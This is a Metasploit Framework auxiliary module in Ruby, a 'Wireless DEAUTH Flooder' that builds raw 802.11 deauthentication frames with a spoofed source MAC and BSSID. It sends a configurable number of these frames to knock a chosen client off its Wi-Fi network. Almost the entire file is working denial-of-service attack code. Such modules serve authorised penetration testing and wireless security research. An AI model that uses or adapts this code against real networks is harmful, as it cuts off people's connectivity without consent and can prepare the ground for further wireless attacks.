metasploit-framework/modules/auxiliary/dos/wireless/deauth.rb

61 lines
1.6 KiB
Ruby

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon
include Msf::Auxiliary::Dos
def initialize(info ={})
super(update_info(info,
'Name' => 'Wireless DEAUTH Flooder',
'Description' => %q{
This module sends 802.11 DEAUTH requests to a specific wireless peer,
using the specified source address and source BSSID.
},
'Author' => [ 'Brad Antoniewicz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
))
register_options(
[
OptString.new('ADDR_DST',[true, "TARGET MAC (e.g 00:DE:AD:BE:EF:00)"]),
OptString.new('ADDR_SRC',[true, "Source MAC (e.g 00:DE:AD:BE:EF:00)"]),
OptString.new('ADDR_BSS',[true, "BSSID (e.g 00:DE:AD:BE:EF:00)"]),
OptInt.new('NUM',[true, "Number of frames to send",100])
],self.class)
end
def run
print_status("Creating Deauth frame with the following attributes:")
print_status("\tDST: #{datastore['ADDR_DST']}")
print_status("\tSRC: #{datastore['ADDR_SRC']}")
print_status("\tBSSID: #{datastore['ADDR_BSS']}")
open_wifi
print_status("Sending #{datastore['NUM']} frames.....")
datastore['NUM'].to_i.times do
wifi.write(create_deauth())
end
close_wifi
end
def create_deauth
seq = [rand(255)].pack('n')
frame =
"\xc0" + # Type/SubType
"\x00" + # Flags
"\x3a\x01" + # Duration
eton(datastore['ADDR_DST']) + # dst addr
eton(datastore['ADDR_SRC']) + # src addr
eton(datastore['ADDR_BSS']) + # BSSID
seq + # sequence number
"\x07\x00" # Reason Code (nonassoc. sta)
return frame
end
end